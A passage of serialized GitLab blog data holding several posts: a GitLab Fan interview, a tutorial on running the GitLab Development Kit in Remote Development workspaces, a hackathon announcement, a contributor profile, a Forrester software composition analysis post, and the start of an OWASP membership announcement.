Fan.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749671316/Blog/Hero%20Images/gitlab-fan-day.png","https://about.gitlab.com/blog/gitlab-fan-profile","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Today is GitLab Fan Day\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Rebecca Dodd\"}],\n        \"datePublished\": \"2017-09-07\",\n      
}",{"title":2321,"description":2322,"authors":2327,"heroImage":2323,"date":2328,"body":2329,"category":10,"tags":2330},[1859],"2017-09-07","\n\nToday we're celebrating [GitLab Fan](https://gitlabfan.com/) and the great work they do to evangelize GitLab 🎉 Read on to learn more about the mysterious figure behind the Fan, and take a look around [our site](/) and see if you can spot any of their illustrations. Also, don't forget to visit us on Twitter to take part in our giveaway – you could get your hands on some awesome, custom GitLab Fan swag.  \n\n\u003C!-- more -->\n\nAt GitLab we're passionate about building a platform where everyone can contribute, and GitLab Fan is a great example of the work our community does, from creating [custom stickers for Telegram and Slack](https://gitlabfan.com/gitlab-stickers-for-telegram-and-slack-16639b2c126) to sharing [tutorials](https://gitlabfan.com/setting-up-your-own-fully-functional-gitlab-https-registry-ci-runners-79901ac617c0) and [takeaways from our culture](https://gitlabfan.com/7-examples-of-extreme-transparency-of-gitlab-e257796c9ef4).\n\nWhile GF's identity remains a mystery (Honest! If they're a GitLab team-member, they're undercover 🕵️), we did get a chance to ask them some questions:\n\n### What inspired you to launch GitLabFan.com?\n\nI used to work with GitLab a lot and I liked it, so I had a lot of thoughts I wanted to share with people.\n\n### Do you use GitLab for work or personal projects (or both)?\n\nMostly personal projects these days.\n\n### What kind of work do you do?\n\nI teach junior developers. By the way, I've started to work on [a course about GitLab CI](https://www.indiegogo.com/projects/learn-continuous-integration-with-gitlab-ci#/) ;)\n\n### Do you work for GitLab? (We have to ask!)\n\nNo, I don't :)\n\n### Have you ever thought about applying to work for GitLab?\n\nYup, I actually did that. But it was not a very serious intention, I did that for fun. 
Twice :)\n\n### If you could change or improve anything about GitLab, what would it be and why?\n\nI would love to see a built-in chat solution, in the same way that GitLab has built-in CI. That will save some time when you set up a new project, and I am also sure there would be some nice synergistic effects.\n\n**Thanks, GitLab Fan, for everything you do.**\n\n*We're giving away some specially designed GitLab Fan swag over on [Twitter](https://twitter.com/gitlab) – head there now to join in!*\n",[267,9],{"slug":2332,"featured":6,"template":689},"gitlab-fan-profile","content:en-us:blog:gitlab-fan-profile.yml","Gitlab Fan Profile","en-us/blog/gitlab-fan-profile.yml","en-us/blog/gitlab-fan-profile",{"_path":2338,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2339,"content":2345,"config":2351,"_id":2353,"_type":14,"title":2354,"_source":16,"_file":2355,"_stem":2356,"_extension":19},"/en-us/blog/gitlab-gdk-remote-development",{"title":2340,"description":2341,"ogTitle":2340,"ogDescription":2341,"noIndex":6,"ogImage":2342,"ogUrl":2343,"ogSiteName":673,"ogType":674,"canonicalUrls":2343,"schema":2344},"Contributor how-to: Remote Development workspaces and GitLab Developer Kit","This tutorial helps you get GDK working inside Remote Development workspaces to begin contributing to GitLab.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670563/Blog/Hero%20Images/cloudcomputing.jpg","https://about.gitlab.com/blog/gitlab-gdk-remote-development","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Contributor how-to: Remote Development workspaces and GitLab Developer Kit\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Raimund Hook\"}],\n        \"datePublished\": \"2023-07-31\",\n      }",{"title":2340,"description":2341,"authors":2346,"heroImage":2342,"date":2348,"body":2349,"category":801,"tags":2350},[2347],"Raimund Hook","2023-07-31","\nOpen source is fundamental 
to GitLab. We believe that [everyone can contribute](https://about.gitlab.com/company/mission/#mission).\nTypically, we recommend that anyone contributing anything more than basic changes to GitLab run the [GitLab Development Kit](https://gitlab.com/gitlab-org/gitlab-development-kit) (GDK). Because contributors can't always meet the GDK's resource demands, we're working to enable GDK inside the cloud-based GitLab Remote Development workspaces.\n\nIn this article, I'll explain how I used a Remote Development workspace running in my Kubernetes cluster to make working with the GDK faster and easier.\n\n## A preliminary note\nFirst, keep in mind that as of this writing the [Remote Development workspaces](https://about.gitlab.com/direction/create/ide/remote_development/) feature is still in Beta. My example here is therefore very much a proof of concept — and as such, it has some rough edges.\n\nBefore getting started, I followed the \"[Set up a workspace](https://docs.gitlab.com/ee/user/workspace/#set-up-a-workspace)\" prerequisites guide in the GitLab docs. For a more detailed set of instructions, see Senior Developer Evangelist Michael Friedrich's tutorial on [how to set up infrastructure for cloud development environments](https://about.gitlab.com/blog/set-up-infrastructure-for-cloud-development-environments/).\n\n## Getting started with workspaces\nTo start using workspaces, you will need a project configured with a `.devfile.yaml`. 
GitLab team members have curated [a number of example projects](https://gitlab.com/gitlab-org/remote-development/examples) you can review.\n\nInitially, I tried to do this with a fork of the GitLab project itself, but I ran into [some issues](https://gitlab.com/gitlab-org/gitlab/-/issues/414011) when the workspace begins cloning the repository.\n\nTo figure out what was causing my problems, I looked more closely at what happens behind the scenes when a workspace is created.\n\n## Behind the scenes with Remote Development workspaces\nWhen you create a new workspace, the following happens:\n1. The GitLab agent for Kubernetes creates a new namespace in your cluster. The agent dynamically generates a name for and assumes management of the namespace.\n1. Inside the namespace, a new deployment is created, specifying the container you chose in your `.devfile.yaml` as the image to use.\n1. This deployment is configured with some [init containers](https://kubernetes.io/docs/concepts/workloads/pods/init-containers/) that perform some actions:\n    1. Cloning the repository into `/project/${project_path}`.\n    1. Injecting the VS Code server binary into your container.\n1. Once those init containers are complete, your container starts and the workspace becomes available.\n\n## The clone problem\nWhen cloning a repository, `git` tends to do much of the work in memory. This can be a challenge on larger projects/repositories, as it can require significant amounts of RAM. When cloning the GitLab project, for instance, git consumes approximately 1.6GB of RAM. This number is only going to increase with time. 
Sure, strategies like [shallow clones](https://git-scm.com/docs/git-clone#Documentation/git-clone.txt---depthltdepthgt) can help reduce this, but these are perhaps less suited to active use by a developer as they can increase the amount of time required to perform ongoing git operations.\n\nIn fact, creating a workspace using our `.devfile.yaml` in a fork of the GitLab project failed for this reason. The init container performing the clone is currently hard-limited to 128MiB of RAM, after which the memory management processes on the node kill the container.\n\nTo overcome this limitation, move the `.devfile.yaml` into the root of a fork of the GDK repository. This project clones more quickly (and does so using fewer resources), so it's a perfect starting point for running GDK itself. Another (bonus) advantage: You're then primed to contribute to the GDK itself, in addition to any of the other GitLab projects that the GDK clones.\n\n## Components of a GDK installation\nGDK clones the following projects from the GitLab 'family':\n* [GitLab](https://gitlab.com/gitlab-org/gitlab)\n* [Gitaly](https://gitlab.com/gitlab-org/gitaly)\n* [GitLab shell](https://gitlab.com/gitlab-org/gitlab-shell)\n\nThis allows you to work on any items in those directories as a part of your \"live\" installation.\n\n## Getting GDK installed and running in a workspace\nOnce I had a workspace up and running, my next step was to get GDK installed and running *in* that workspace. The GDK's documentation presents [several routes for doing this](https://gitlab.com/gitlab-org/gitlab-development-kit/#installation).\n\nA complete installation can take some time, as GDK needs to bootstrap itself and install a number of prerequisites. This is less than ideal in the context of a Remote Development workspace, as one of remote development's primary benefits is enabling access to a development environment rapidly. 
Requiring a user to bootstrap an environment that takes 50 minutes (or longer) doesn't help achieve this goal.\n\nTo combat this, I built a container image that effectively bootstraps and installs GDK, pre-building the GDK prerequisites and pre-seeding the database. This image and its associated tooling are currently [in review](https://gitlab.com/gitlab-org/gitlab-development-kit/-/merge_requests/3231).\n\n## Pre-building\nPre-building the container and running the bootstrap process on a scheduled basis allows us to perform that process once, without requiring the user to wait for something that can essentially be \"pre-canned\" for their use.\n\nOnce the workspace is running, we still need to \"reinstall\" the GDK environment with the latest version of our GitLab repository, but this step doesn't take quite as long as a complete bootstrap.\n\n## Generating a gdk.yml file\nTo work properly, GDK also requires a [`gdk.yml` file](https://gitlab.com/gitlab-org/gitlab-development-kit/-/blob/main/doc/configuration.md#gdkyml). This file tells GDK how to configure GitLab to return the correct URLs and other items. To get GDK running in Remote Development, Rails needs to return URLs in a certain scheme (otherwise your browser won't know where to connect). To help this along, we [inject an environment variable](https://gitlab.com/gitlab-org/gitlab/-/issues/415328) into the workspace container. This variable helps us determine the URL in use (which is dynamically generated for each workspace).\n\nWe [now have a script](https://gitlab.com/gitlab-org/gitlab-development-kit/-/blob/main/support/gitlab-remote-dev/remote-dev-gdk-bootstrap.sh?ref_type=heads) in GDK that will generate your `gdk.yml` file based on your workspace.\n\n## Creating our devfile\nThe contents of my `.devfile.yaml` looks like this:\n\n```yaml\nschemaVersion: 2.2.0\ncomponents:\n  - name: tooling-container\n    attributes:\n      gl/inject-editor: true\n    container:\n      # NB! 
This image is only in use until https://gitlab.com/gitlab-org/gitlab-development-kit/-/merge_requests/3231 is merged!\n      image: registry.gitlab.com/gitlab-org/gitlab-development-kit/gitlab-remote-workspace:stingrayza-gdk-remote-dev-add-container\n      memoryRequest: 10240M\n      memoryLimit: 16384M\n      cpuRequest: 2000m\n      cpuLimit: 6000m\n      endpoints:\n        - name: ssh-2222\n          targetPort: 2222\n        - name: gdk-3000\n          targetPort: 3000\n        - name: docs-3005\n          targetPort: 3005\n        - name: pages-3010\n          targetPort: 3010\n        - name: webpack-3808\n          targetPort: 3808\n        - name: devops-5000\n          targetPort: 5000\n        - name: jaeger-5778\n          targetPort: 5778\n        - name: objects-9000\n          targetPort: 9000\n        - name: shell-9122\n          targetPort: 9122\n```\n\nThis definition comes straight out of the [Workspace docs](https://docs.gitlab.com/ee/user/workspace/#devfile), and opens a number of ports that GDK uses. (For now, I've only tested the port `gdk-3000`, which is the link to our instance of GDK.)\n\n## From Workspace to GDK\nOnce we have a project with a `.devfile.yaml`, our final step is to [create a new workspace](https://docs.gitlab.com/ee/user/workspace/#create-a-workspace).\n\nAs a part of this step, your cluster will pull the image as defined in the `.devfile.yaml` and start it up. For the GDK image we pre-built, this can take a few minutes.\n\nOnce the workspace is ready, the last step is to follow the link from the UI to connect to the workspace. This will open up a familiar VS Code IDE, with our GDK fork checked out.\n\nBut wait, where's GDK?\n\nWell, the pre-build did most of the work for us, but we still need to take a few final steps before we can claim that GDK is up and running. 
These have been built into a script we can run from the integrated terminal within the workspace.\n\nTo open a terminal, we can click on the VS Code Hamburger menu (top left), navigate to `Terminal` and select `New Terminal`.\n\nNow we execute the following script, which completes the setup and copies a couple of files over from the pre-built folders:\n\n```shell\nsupport/gitlab-remote-dev/remote-dev-gdk-bootstrap.sh\n```\n\nThis can take up to 15 minutes, but when it's done it should output the magic words — something like the following (note the 3000 in the URL; we specified that in the `.devfile.yaml` earlier):\n\n```shell\nSuccess! You can access your GDK here: https://3000-workspace-62637-2083197-apglwp.workspace.my-workspace.example.net/\n```\n\n## Connect to your GDK\nFollow the link as displayed using Cmd-click or Ctrl-click. After a couple of moments (GDK boot time), you should reach a familiar GitLab login screen.\n\nCongratulations! GDK is now running inside your Remote Development workspace.\n\nTo log in, type `gdk` in your terminal and you'll see the default admin credentials displayed near the bottom:\n\n```shell\n# Development admin account: xxxx / xxxx\n\nFor more information about GitLab development see\nhttps://docs.gitlab.com/ee/development/index.html.\n```\n\nLog into your GDK with the default credentials, change the admin user password, and you're all set!\n\n## Demo of workspace launch\nHere's a demo of launching a workspace in my personal cluster:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/iXq1NnTjnX0\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## How to contribute to GitLab\nIn this article I explained how to get GDK up and running in Remote Development workspaces. 
This is not without its challenges, but the end result should mean that contributing to GitLab (especially in resource-constrained environments) is quicker and easier.\n\nDo you want to contribute to GitLab? Come and join in the conversation in the `#contribute` channel on GitLab's [Discord](https://discord.gg/gitlab), or just pop in and say \"hello.\"\n\n_Disclaimer: This blog contains information related to upcoming products, features, and functionality. It is important to note that the information in this blog post is for informational purposes only. Please do not rely on this information for purchasing or planning purposes. As with all projects, the items mentioned in this blog and linked pages are subject to change or delay. The development, release, and timing of any products, features, or functionality remain at the sole discretion of GitLab._",[752,685,686,845,708,9],{"slug":2352,"featured":6,"template":689},"gitlab-gdk-remote-development","content:en-us:blog:gitlab-gdk-remote-development.yml","Gitlab Gdk Remote Development","en-us/blog/gitlab-gdk-remote-development.yml","en-us/blog/gitlab-gdk-remote-development",{"_path":2358,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2359,"content":2364,"config":2369,"_id":2371,"_type":14,"title":2372,"_source":16,"_file":2373,"_stem":2374,"_extension":19},"/en-us/blog/gitlab-hackathon",{"title":2360,"description":2361,"ogTitle":2360,"ogDescription":2361,"noIndex":6,"ogImage":1348,"ogUrl":2362,"ogSiteName":673,"ogType":674,"canonicalUrls":2362,"schema":2363},"Announcing the GitLab Hackathon","The first Hackathon event for the GitLab community will take place September 27-28.","https://about.gitlab.com/blog/gitlab-hackathon","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Announcing the GitLab Hackathon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2018-09-17\",\n      
}",{"title":2360,"description":2361,"authors":2365,"heroImage":1348,"date":2366,"body":2367,"category":10,"tags":2368},[704],"2018-09-17","\n\nWhat makes GitLab a great community is that contributions to the GitLab product come from everyone, regardless of whether they are employed by GitLab or not. Concrete evidence of broad community contribution can be seen in the more than 2,500 merged  [“community contribution”](https://gitlab.com/groups/gitlab-org/-/merge_requests?label_name%5B%5D=Community+contribution&scope=all&sort=weight&state=merged) MRs. This community contribution not only helps to enhance the GitLab product, but also brings fresh ideas and perspectives.\n\n![Screenshot showing more than 2,500 merged community MRs](https://about.gitlab.com/images/blogimages/2018-09-13-gitlab-hackathon-inline.png){: .shadow.medium.center}\n*\u003Csmall>MRs from community members not employed by GitLab\u003C/small>*\n\n## What's the deal?\n\n In order to build momentum and to provide a forum for community members to get together, I'm excited to announce that we're holding a [GitLab Hackathon on September 27 and 28](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/wikis/Q3%272018-hackathon). This virtual event will kick off at 07:00 UTC on the 27th and the focus will be to work on issues that are [\"Accepting merge requests\"](https://gitlab.com/gitlab-org/gitlab/-/issues?label_name%5B%5D=Accepting+merge+requests&sort=weight_asc). As an incentive, anyone who has their MRs merged within a week of Hackathon period will receive a voucher for GitLab swag. We will also have a bigger prize for the person with the most MRs merged.\n\n## What else is going on?\n\nIn addition to hacking, we plan to invite community experts for quick presentations plus Q&A sessions on various topics over the two days. These sessions will also be recorded and available on [GitLab YouTube channel](https://www.youtube.com/gitlab). 
The Hackathon will be followed by the [Issue Bash](/community/issue-bash/) from September 29-30.\n\n## Where can I find help?\n\nFor communications during the Hackathon, we will use the new [GitLab Community room in Gitter](https://gitter.im/gitlabhq/community). We already have a [gitlabhq room](https://gitter.im/gitlabhq/gitlabhq) that’s been active with support discussions. However, we wanted to create a separate community room where contributors to GitLab can come together to have community-related discussions and to help each other as people have questions while contributing to GitLab. This is open to everyone, so please [join the room](https://gitter.im/gitlabhq/community) if you are not part of it already.\n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\nCover image: [\"Gitlab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel).\n{: .note}\n",[267,779,9,277],{"slug":2370,"featured":6,"template":689},"gitlab-hackathon","content:en-us:blog:gitlab-hackathon.yml","Gitlab Hackathon","en-us/blog/gitlab-hackathon.yml","en-us/blog/gitlab-hackathon",{"_path":2376,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2377,"content":2383,"config":2390,"_id":2392,"_type":14,"title":2393,"_source":16,"_file":2394,"_stem":2395,"_extension":19},"/en-us/blog/gitlab-heroes-unmasked-lessons-from-early-mistakes",{"title":2378,"description":2379,"ogTitle":2378,"ogDescription":2379,"noIndex":6,"ogImage":2380,"ogUrl":2381,"ogSiteName":673,"ogType":674,"canonicalUrls":2381,"schema":2382},"Overcoming coding challenges to become a valued GitLab hero","Niklas van Schrick shares his journey from learning a new language to becoming an active 
contributor to GitLab.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749668009/Blog/Hero%20Images/wrong-way-2.jpg","https://about.gitlab.com/blog/gitlab-heroes-unmasked-lessons-from-early-mistakes","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Heroes Unmasked: How a difficult start in coding led to being a valued contributor\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jamie Rachel\"}],\n        \"datePublished\": \"2022-04-26\",\n      }",{"title":2384,"description":2379,"authors":2385,"heroImage":2380,"date":2387,"body":2388,"category":1119,"tags":2389},"GitLab Heroes Unmasked: How a difficult start in coding led to being a valued contributor",[2386],"Jamie Rachel","2022-04-26","\n\nA key to GitLab’s success is our vast community of advocates. Here at GitLab, we call these active contributors [\"GitLab Heroes\"](/community/heroes/). Each hero contributes to GitLab in numerous ways, including elevating releases, sharing best practices, speaking at events, and more.  [Niklas van Schrick](https://gitlab.com/Taucher2003), who currently works as a Developer trainee, has been an active GitLab Hero since November 2021. \n\nNiklas upholds the [GitLab values](https://handbook.gitlab.com/handbook/values/), especially for transparency, by sharing his trials and discoveries with self-hosted instances. We all can learn from each other’s mistakes, which leads to collaborating to improve processes and build a better developer experience.\n\nHis journey to becoming a GitLab hero is detailed below.\n\n## A difficult beginning\n\n**Niklas van Schrick:** Every developer has to start somewhere. My journey started in May 2019 with Java and Minecraft. 
While development in Minecraft is great for fast results, based on my experience it’s not the best idea for a beginner.\n\nIt introduces the problem of learning a framework instead of the actual language and it delayed my learning process. I was able to write some functionality as plugins for a server, but I didn't know a single principle of the underlying language, Java. That led to code that was not easily maintainable. For each new functionality, I was building quickly without properly thinking about the structure of my code.\n\nWhen I was starting out, I learned from another developer. Although it is great to have someone guide you through the process, it can also lead to issues. My mistake was believing everything my mentor told me and not looking for solutions myself. In this way, I learned anti-patterns of code design, which led to a full refactoring of the project at a later time. It also slowed down my learning process further as I was asking for help before searching for solutions myself.\n\n## The importance of joining a developer community\n\n**Van Schrick:** In early 2020, we moved our projects to a self-hosted GitLab instance. It was my first experience with [version control](/topics/version-control/). It was a big advantage because we were able to see previous changes and easily identify the causes of bugs. I recommend using a version control system even in the early stages of your development journey, as it makes many things easier and keeps a history of your work. In the beginning, it is totally fine to just push to master or not even use a remote repository.\n\nA big improvement for me was joining a [developer community](/community/), as there are many developers who are happy to help. I learned many new concepts that were widely used by the developers of that community, and this led to much more maintainable code. 
You don't even have to actively ask in the community to learn new things.\n\nMost of the time, it is enough to keep up with the messages and read the conversations from others. In a helpful developer community, you always have someone who says, \"Why are you doing it like this? There are better ways to do this,\" and offers suggestions to improve the code.\n\n## Contribute, contribute, contribute\n\n**Van Schrick:** Another big step is to make contributions to open source projects. It allowed me to be part of the code review process from others, and learn from it. My first contribution to an open source project, which was not led by me, was a [typo fix in a GitLab view](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/54834). I was surprised at how well the code review went and how fast it got merged. The positive experience encouraged me to join an open source project as a maintainer, and it has been a great experience. I ended up being an active contributor to the GitLab project and a GitLab Hero.\n\n_GitLab welcomes every new contributor and has [many possibilities for your first contribution](/community/contribute/)._\n",[708,9,267],{"slug":2391,"featured":6,"template":689},"gitlab-heroes-unmasked-lessons-from-early-mistakes","content:en-us:blog:gitlab-heroes-unmasked-lessons-from-early-mistakes.yml","Gitlab Heroes Unmasked Lessons From Early Mistakes","en-us/blog/gitlab-heroes-unmasked-lessons-from-early-mistakes.yml","en-us/blog/gitlab-heroes-unmasked-lessons-from-early-mistakes",{"_path":2397,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2398,"content":2404,"config":2411,"_id":2413,"_type":14,"title":2414,"_source":16,"_file":2415,"_stem":2416,"_extension":19},"/en-us/blog/gitlab-is-an-sca-contender",{"title":2399,"description":2400,"ogTitle":2399,"ogDescription":2400,"noIndex":6,"ogImage":2401,"ogUrl":2402,"ogSiteName":673,"ogType":674,"canonicalUrls":2402,"schema":2403},"Forrester names GitLab challenger in software composition","GitLab has 
been recognized by analysts as a challenger in Software Composition Analysis.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749669950/Blog/Hero%20Images/security-cameras.jpg","https://about.gitlab.com/blog/gitlab-is-an-sca-contender","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab is named a Challenger in The Forrester Wave™: Software Composition Analysis, Q2 2019\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Cindy Blake\"}],\n        \"datePublished\": \"2019-04-12\",\n      }",{"title":2405,"description":2400,"authors":2406,"heroImage":2401,"date":2408,"body":2409,"category":299,"tags":2410},"GitLab is named a Challenger in The Forrester Wave™: Software Composition Analysis, Q2 2019",[2407],"Cindy Blake","2019-04-12","\n\nWhile GitLab is best known in the traditional DevOps space, we have also begun to grow out our expertise in application security, which may come as a [surprise to security professionals](https://www.linkedin.com/pulse/ciso-cheat-sheet-git-cindy-blake-cissp), who may not have encountered us previously. 
We may have started out focused on traditional developer tools, however, as GitLab has added capabilities to cover the entire Software Development\nLifecycle (SDLC), this now includes not only a market-leading [Continuous Integration](/blog/gitlab-leader-continuous-integration-forrester-wave/)\nsolution but also, more recently, integrated [application security testing built into the CI/CD pipeline](/solutions/security-compliance/).\nOur single, end-to-end application enables security testing that is tightly aligned to today’s\nrapid, [iterative cycles of DevOps](/solutions/security-compliance/) development and the modern\ninfrastructure that accompanies cloud native applications.\n\n## Who was included?\n\nFor The Forrester Wave™: Software Composition Analysis, Q2 2019, participating vendors were required to\nhave most of the following capabilities out of the box:\n- Ability to provide remediation advice on both open source license risk and vulnerabilities;\n- Ability to integrate into SDLC automation tools;\n- Ability to provide proactive vulnerability management;\n- Ability to edit and create policies; and\n- Ability to visually report on open source risk.\n\nParticipating vendors were also required to have more than $10M in revenue and have\ninterest from Forrester clients or relevance to them.\n\n## GitLab is a new challenger\n\nHaving only added security capabilities in December 2017, GitLab has been excluded from\nother analyst application security reports that only look at more established players.\nIn our first official security-oriented analyst evaluation, we are excited not only to get the\nword out about GitLab’s security capabilities, but also to have this opportunity for analyst\nfeedback and insight into how GitLab compares. We take to heart not only areas where we\nshine – but also where improvement is needed. With GitLab,\n“[everyone can contribute](/community/contribute/),” and the feedback gained from\nForrester is another valuable contribution. 
We also welcome [your participation](/community/contribute/) and invite you to help us\nunderstand what you would like to see as our security capabilities grow.\n\nBased on this analyst report and analyst interaction feedback, we are already addressing improvement opportunities in our\n[roadmap](/direction/secure/#upcoming-releases) and [vision](/direction/secure/#direction).\n\n**Check out our [complete SCA response](/analysts/forrester-sca/) for links to specific updates and response comments.**\n\nAs a company dedicated to releasing incrementally, delivering first on breadth and then\non depth, it is not uncommon for GitLab to initially place in more of a challenger position,\nas our feature set generally does not have the same maturity as established players in the space.\nHowever, when GitLab enters a space, we do so boldly, with clear intentions and a solid strategy.\nGitLab’s strategy for application security testing and software composition analysis focuses\nmore equally on both the developer and the security professional than traditional solutions.\nYou will find some areas in strategy where we were not scored as highly as we believe we\nshould be, due to our more aggressive focus on development.\n\n## Updates since the evaluation\n\nGitLab has shipped a [major new release every month](/releases/categories/releases/)\nfor 90 consecutive months. Forrester evaluated GitLab 11.6 for this report while versions\n[11.7](/releases/2019/01/22/gitlab-11-7-released/), [11.8](/releases/2019/02/22/gitlab-11-8-released/), and\n[11.9](/releases/2019/03/22/gitlab-11-9-released/) have since been released. 
You will find several features\nthat Forrester felt were lacking have already been added, including improvements to the\nsecurity dashboard, additional languages added to SAST scanning, and secrets detection.\nWhen using Forrester’s scoring tool, be sure to adjust the criteria for our current capabilities.\nA list of what’s been added since Forrester’s evaluation can be found on our [complete SCA response](/analysts/forrester-sca/).\n\n## Forrester’s key takeaway: “Remediation, policy management, and reporting are key differentiators”\n\nForrester says, “As developers continue to use open source to accelerate the release of new\napplication functionality, remediation, policy management, and reporting will dictate which\nproviders will lead the pack. Vendors that can provide developers with remediation advice\nand even create patches position themselves to significantly reduce business risk.”\n\nThis takeaway is closely aligned with GitLab's [vision for application security testing](/direction/secure/#direction)\nand our work in progress for [auto remediation](https://gitlab.com/groups/gitlab-org/-/epics/133). While not available in the evaluated version (11.6), today’s GA release, (11.9), [can detect a more current patch available](/releases/2019/03/22/gitlab-11-9-released/#vulnerability-remediation-merge-request) and\nenable the developer to create a [new branch and apply the patch](https://docs.gitlab.com/ee/user/application_security/security_dashboard/#create-a-merge-request-from-a-vulnerability)\nwith one click. 
Upcoming versions will [automatically run the pipeline and present the results](https://gitlab.com/groups/gitlab-org/-/epics/275) to the developer to accept or reject.\nBy automating remediations that are readily apparent, developers and security can focus on\nvulnerabilities whose remediation is not as straightforward.\n\nThe fact that GitLab is a [single application](/) for the entire SDLC enables us to take\nremediation even further – actually running the pipeline in a separate branch,\neven [measuring the performance impact](https://gitlab.com/gitlab-org/gitlab-ee/issues/9382)\nof the patch. We isolate the cause and effect: the developer makes a code change, that code is\ntested and they see the results before merging the code with others’. It also allows us to do [Dynamic scanning](https://docs.gitlab.com/ee/user/application_security/dast/) in the same manner, before the\ncode is merged with anyone else’s. We do this by spinning up a\n[review app](https://docs.gitlab.com/ee/ci/review_apps/) in the pipeline report.\nThis fully functioning app reflects the developer’s code changes and can be used for user testing,\nperformance testing, and dynamic app security scanning.\n\n## GitLab's advice\n\nWe believe GitLab is ideal for enterprises who are:\n\n* Using GitLab for CI/CD.\n* Practicing iterative development via DevOps.\n* Using containers and serverless.\n\nFor the enterprise that has not invested in app sec tools, GitLab can quickly provide\nscanning, often necessary for regulatory compliance, with a single application.\nGitLab offers SAST, DAST, Dependency, Container Scanning, and License Management [with one app](/stages-devops-lifecycle/application-security-testing/) – no need to evaluate and buy from multiple vendors, then stitch together integration with the DevOps toolchain. 
In fact, GitLab customer, [Glympse Inc.](https://glympse.com/),\nstood up 40 repos with automated security testing, using all of the GitLab scans, in less time\nthan they could have installed just the individual tools – and as a bonus, they impressed their\nauditors with their process.\n\nFor the enterprise already deeply invested in traditional app sec tools, GitLab affords a\nbroader and [earlier scanning effort](/solutions/security-compliance/), using a tool that\ndevelopers are already using. GitLab can scan every code change, much the way that\nevery airplane passenger gets scanned through security. Save the deeper scans for\nlater and/or less frequent evaluation by the security team. Consider using GitLab on select\nprojects to experience the more efficient workflow and potentially reduce your scanning costs from costlier tools.\n\n## Our response\n\n We invite you to see our [complete response](/analysts/forrester-sca/), and as always, welcome\n [your contributions](/community/contribute/)!\n\n Cover image by [Scott Webb](https://unsplash.com/@scottwebb) on [Unsplash](https://unsplash.com/photos/yekGLpc3vro)\n{: .note}\n",[845,803,9,930,865,953],{"slug":2412,"featured":6,"template":689},"gitlab-is-an-sca-contender","content:en-us:blog:gitlab-is-an-sca-contender.yml","Gitlab Is An Sca Contender","en-us/blog/gitlab-is-an-sca-contender.yml","en-us/blog/gitlab-is-an-sca-contender",{"_path":2418,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2419,"content":2425,"config":2431,"_id":2433,"_type":14,"title":2434,"_source":16,"_file":2435,"_stem":2436,"_extension":19},"/en-us/blog/gitlab-is-now-a-member-of-the-owasp-foundation",{"title":2420,"description":2421,"ogTitle":2420,"ogDescription":2421,"noIndex":6,"ogImage":2422,"ogUrl":2423,"ogSiteName":673,"ogType":674,"canonicalUrls":2423,"schema":2424},"GitLab is now a member of the OWASP Foundation","GitLab is thrilled to announce our membership in the OWASP 
Foundation.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679658/Blog/Hero%20Images/Owasp_logo.jpg","https://about.gitlab.com/blog/gitlab-is-now-a-member-of-the-owasp-foundation","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab is now a member of the OWASP Foundation\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Wayne Haber\"}],\n        \"datePublished\": \"2020-01-21\",\n      }",{"title":2420,"description":2421,"authors":2426,"heroImage":2422,"date":2428,"body":2429,"category":865,"tags":2430},[2427],"Wayne Haber","2020-01-21","\n\nGitLab is thrilled to announce our membership in the [OWASP Foundation](https://www2.owasp.org/).  OWASP is a non-profit that works to improve the security of software through open-source projects, worldwide local chapters, tens of thousands of members, and educational/training conferences.\n\nWe leverage OWASP to help provide security features integrated into the development lifecycle via the [Secure stage](/stages-devops-lifecycle/secure/) and defending your apps and infrastructure from security intrusions via the [Protect stage](/stages-devops-lifecycle/govern/).  
